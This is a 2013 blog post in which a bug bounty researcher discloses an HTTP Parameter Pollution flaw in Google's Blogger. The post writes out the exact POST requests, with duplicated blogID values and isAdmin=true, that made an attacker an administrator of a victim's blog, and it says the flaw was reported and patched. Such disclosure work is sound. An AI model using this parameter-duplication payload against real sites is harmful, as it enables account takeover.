29 March 2013

Category: Hacks
29 March 2013,
 0

This is the first post on my blog and will also be the first post to detail my ability to find security vulnerabilities in the Google Reward Program.

Over the last 2 months, I have participated in the Google Reward Program and found some relatively serious vulnerabilities.

(As a disclaimer, I want to say that Google has a security team full of consummate and brilliant professionals. It is truly amazing how much Google cares about security and how amazing their work is in regard to securing their sites. Thanks Adam of the Google Security Team for allowing me to showcase my skills).

The first vulnerability that I want to reveal is a critical one in the Blogger platform (a Google Service). This vulnerability could be utilized by an attacker to gain administrator privilege over any Blogger account (categorized as a “Permission” issue).

The details regarding the Blogger service issue are as follows.

I located an HTTP Parameter Pollution vulnerability in Blogger that permits an attacker to designate themselves as an administrator on a victim’s Blogger account.

 

Technical details:

 

Below, you’ll find the steps for gaining admin control permissions over virtually any Blogger account:

1.

The attacker uses the invite author options in Blogger (i.e. add authors).

Vulnerability location:

 

POST /add-authors.do HTTP/1.1

Request:

 

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite

As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)

 

 

The server examines the first blogid value and then executes the attacker’s second blogid value.

 

2.

The attacker will then receive an email to confirm him as an author (author invitation link). The attacker will be added as an author on the victim’s account.

 

3.

It is now possible to alter the attacker permission so that it rises from a simple author to an actual admin.

Vulnerability Location:

POST /team-member-modify.do HTTP/1.1

Request:

security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges

 

And?

PoC Video:


2.(Full Video Download):  http://www.2shared.com/file/90mjfuab/Blogger_Get_Administrator_priv.html  (The vulnerability mentioned here has been confirmed patched by the Google Security Team very fast.)

By @Nirgoldshlager

Leave a Reply

Your email address will not be published. Required fields are marked *